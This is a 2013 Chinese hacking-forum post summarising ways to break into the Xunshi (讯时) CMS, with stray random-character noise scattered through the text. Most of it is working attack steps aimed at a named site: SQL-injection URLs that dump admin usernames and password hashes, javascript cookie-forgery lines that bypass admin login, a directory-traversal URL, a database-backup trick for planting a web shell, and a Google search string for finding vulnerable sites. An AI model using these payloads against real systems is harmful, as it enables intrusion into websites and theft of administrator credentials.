找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2702|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘1 u& V0 q' X' ]1 o/ t% l( t* P  a

6 P. K" `, ]7 G' z在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)2 k5 b* N8 q- ]3 m* P, \) c
' x8 T7 A/ l  R0 ?# t4 s
以下本文总结来自黑防去年第9期杂志上的内容...
: _+ X" D1 @* r, Z0 C" j- x' x* a+ m6 A3 t
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%* y: D( A  X& }1 z5 {

4 k6 b% r! A+ G+ \  H7 L. f+ s26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
$ w+ K9 P6 m% e" i' d0 D+ D7 S3 L, u- G: ?
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况, b4 e  ~4 S; e; j+ K9 U
这里一个注入
0 F% f7 I! N! q# O
" i9 u, C% V, r+ K! C效果如图:
4 X2 x- A( l7 a" R: Y8 b/ n/ K( w* }! s1 I2 J0 O

- y$ K( Y# ?! b1 C' f- I
1 t7 Y/ p% k7 r& q这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
8 c, u. r, O+ s
. v+ n" w$ U( a7 Y, X密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
/ N8 c3 O: `) N; n; o2 u
% Q+ V0 S6 W. Z5 d4 t4 vjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));; U* R: u0 v1 D+ J
) \# G0 H, p8 d" |4 _
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:. y; k1 f, d* ~( V5 l4 |( o- t

( ]9 s5 |7 X% b) X- J/ C因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞0 S0 r- b0 _' _# R) h6 ?& J

0 W, M% v$ Q) ]. e4 _5 U它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
+ e; U% @$ U  J
# j1 P' j7 M$ X3 s8 _访问这页面来列目录..步骤如下:
2 n/ t& x! O3 o: j& }
, h6 }5 X+ T8 @  F* Jjavascript:alert(document.cookie="admindj=1")
5 D0 X" x+ v# N# A, G3 P! U
: e2 Y# r& H3 i4 t: R- G4 U4 {9 Ohttp://www.political-security.co ... asp?id=46&dir=../..
0 [0 W7 ?4 H& c0 g1 u& K5 {/ n: \0 ~6 b( Z- c5 B
效果如图:# R9 ]5 g1 {4 G! k

4 h0 G5 o3 P: B) }0 v9 W4 h
. {6 c1 ^' [2 n: j- p( _; Q3 C$ |% z0 h7 y5 }' j  \$ Z
这样全站目录都能瞧了..找到后台目录..进去..
! n, V! s7 `/ ^% w% o3 ~; H
/ m" c5 \2 N$ f: u, T9 c那么进了后台怎么拿shell??上传--备份就ok了..& y" \8 m2 q7 p9 t0 |8 k" S1 s
- c( F. U% u( |
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..; h( b2 @5 h. [  D1 c  o' |

: R3 {$ q6 g2 D$ ^7 v; U这个我也碰到过一次..你都可以通过列目录来实现..
2 A7 `* w- Y! `  Q$ `
& n% j4 z8 |8 t/ |. k5 {javascript:alert(document.cookie="admindj=1")
# }& d9 u& g3 i' o% Q/ ?$ \
8 D5 K( n% Z7 I4 Nhttp://www.political-security.co ... p?action=BackupData & o$ V: a( q  R4 H% \2 r- n5 g

6 r; X: C. y7 |; ~, e5 |3 ~- A1 e, x8 y备份ok..
5 L5 `& a# @' y% {: [5 u6 ?3 {" C, T4 h$ z7 q9 c8 R
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?1 ^$ D% A! C) ~: n
8 o# ?& P- c; E1 A3 P
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
3 \9 n6 i) J* f1 J0 {: Y, j8 x) |$ u' n
然后访问此页面进行注入..步骤如下:
& r3 A; M, C. l& A7 ~8 ]
2 h$ ^, A" ]8 c, e+ ^javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")$ H) W, j3 Z4 H! ]7 S0 K! F! o' o

9 ]$ T+ H6 J1 a/ B, g9 n然后请求admin/admin_chk.asp页面% _1 b6 p: u7 Q) P! `: q
8 r% O7 [* }9 B% e7 a( V$ `" `
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
8 J! p) u' ^9 p# f# c3 p% c$ Y$ N4 W  M: k) f/ f7 {$ Y# w
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
* ~, Z$ m- C, D2 d6 n# r7 w& H2 c5 d5 D: o0 C  w
效果如图所示:% `5 _! }$ S7 m1 s* s8 ~
/ u$ S2 L: v# q  A4 s

7 L" _' o9 X: J1 o4 o9 N7 O, O6 O+ j5 I, Z/ O- C
讯时漏洞2( Z2 r' F4 [4 p2 s9 a
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
0 h; V' T& Z3 y - w& ]& _4 j! B' a4 x2 m
1、/admin/admin_news_pl_view.asp?id=1: P$ ]; |% w' T% r, K6 U0 m
//id任意 填入以下语句. e; Q1 ^/ ~+ y/ G+ z( F
5 D. y  L/ E0 ]: X5 s; v2 U
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!5 f7 D# r/ v1 m; y/ V% T

, G5 \8 @' d4 {# F" k. S9 [. k9 S$ u& [8 c: B7 n1 A

4 M( V, S) \$ v9 \3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
" R  `7 P3 B% ~; [1 {6 r5 c  ]% ^  F ! }# v! s1 F0 @) L- \6 l0 G5 `# l
8 a! R! h: P$ m  l. X6 W+ p
0 ]& l! I: T& @* U& r
爆出管理员帐号和密码了
- I8 B8 ?2 Y) v  \  [' K . ~+ a+ P# [( U
) ~3 }% Y! N  g" @. o( Y
- w; W# u# X1 w6 K" k
4、cookies进后台
- V' _, q  @% ]' M
( _4 n  H' }' o) H* R) L0 xjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));  f  P- p/ ~2 J5 T1 C; c
3 z+ B! [9 O! B) v; w6 N6 U+ Y$ m

, T& J5 A$ H3 n" q5 T- E2 o" G2 y9 x+ [3 |2 L2 L8 p
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
2 |2 {& V6 K% j1 i' ~ % [4 k6 h% i$ D) Q

; _3 R' a- q: H" B  I  y
) C1 ?+ U* K( f' q" R0 ]6、后台有上传和备份取SHELL不难。7 S4 a* l# i8 l) B* |% y

% @% W' Q6 O" Q/ v+ B' F7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..7 l: o+ F" L, d5 p6 f0 A* ]
2 M5 c5 y, K. |0 D
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!' x5 z2 m7 p" v- v  S8 U

3 ?7 c) u' e) R
, B; }* b3 N6 u# b* o2 J
5 R+ U( c! }6 @7 o$ T+ X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表